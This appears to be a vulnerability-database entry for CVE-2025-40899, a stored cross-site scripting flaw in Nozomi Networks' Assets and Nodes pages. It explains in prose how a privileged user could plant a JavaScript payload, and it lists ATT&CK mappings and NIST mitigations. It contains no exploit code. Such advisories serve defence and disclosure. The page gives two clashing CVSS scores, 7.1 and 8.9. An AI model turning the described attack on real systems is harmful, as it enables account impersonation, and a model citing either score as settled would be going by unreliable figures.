CVE-2025-40899
Published: 15 April 2026
Summary
CVE-2025-40899 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Nozominetworks (inferred from references). Its CVSS base score is 7.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 20.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-40899 is a Stored Cross-Site Scripting (XSS) vulnerability (CWE-79) in the Assets and Nodes functionality of Nozomi Networks software, stemming from improper validation of an input parameter. Published on 2026-04-15, it carries a CVSS v3.1 base score of 8.9 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H), indicating high severity due to its potential for integrity and availability impacts with changed scope.
An authenticated attacker with custom fields privileges can create a malicious custom field containing a JavaScript payload. When a victim views the Assets or Nodes pages, the stored XSS executes in their browser context, allowing the attacker to impersonate the victim and perform unauthorized actions, such as modifying application data, disrupting application availability, and accessing limited sensitive information.
Mitigation details are available in the vendor advisory NN-2026:2-01 at https://security.nozominetworks.com/NN-2026:2-01.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-209471
Vulnerability details
A Stored Cross-Site Scripting vulnerability was discovered in the Assets and Nodes functionality due to improper validation of an input parameter. An authenticated user with custom fields privileges can define a malicious custom field containing a JavaScript payload. When the…
more
victim views the Assets or Nodes pages, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS directly enables arbitrary JavaScript execution in victim browser (T1059.007) and facilitates session impersonation/hijacking via payload (T1185).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates the root cause by requiring validation of input parameters in custom fields to block injection of malicious JavaScript payloads.
Prevents execution of stored XSS payloads by filtering or encoding information output when rendering Assets and Nodes pages in victims' browsers.
Requires timely identification, reporting, and remediation of the stored XSS flaw, including applying vendor patches from advisory NN-2026:2-01.